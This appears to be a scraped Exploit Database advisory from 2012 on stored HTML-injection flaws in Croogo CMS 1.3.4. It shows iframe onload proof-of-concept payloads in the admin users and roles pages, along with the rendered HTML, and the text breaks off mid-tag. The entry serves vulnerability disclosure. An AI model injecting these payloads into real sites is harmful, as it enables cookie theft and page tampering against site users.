Croogo CMS 1.3.4 – Multiple HTML Injection Vulnerabilities

• Exploit Database
• 130 阅读

• 作者： Chokri Ben Achor
  日期： 2012-04-29
• 类别：

  • webapps
  平台：

  • perl
• 来源：https://www.exploit-db.com/exploits/37117/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  source: https://www.securityfocus.com/bid/53287/info   Croogo CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.   Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.   Croogo CMS 1.3.4 is vulnerable; other versions may also be affected.   URL: http://www.example.com/croogo/admin/users   <td>"><iframe src="https://www.exploit-db.com/exploits/37117/a" onload=&apos;alert("VL")&apos; <<="" td=""> <td>"><iframe src=a onload=alert("VL") <</td> <td>asdasd () aol com</td>   <td><a href="https://www.exploit-db.com/croogo/admin/users/edit/2">Edit</a> <a href="https://www.exploit-db.com/croogo/admin/users/delete/2/token: c68c0779f65f5657a8d17c28daebcc7a15fe51e3"   onclick="return confirm(&apos;Are you sure?&apos;);">Delete</a></td></tr>     URL: http://www.example.com/croogo/admin/roles   <tr class="striped"><td>4</td> <td>"><iframe src="https://www.exploit-db.com/exploits/37117/a" onload=&apos;alert("VL")&apos; <<="" td=""> <td>"><iframe src=a onload=alert("VL") <</td> <td> <a href="https://www.exploit-db.com/croogo/admin/roles/edit/4">Edit</a> <a href="/croogo/admin/roles/delete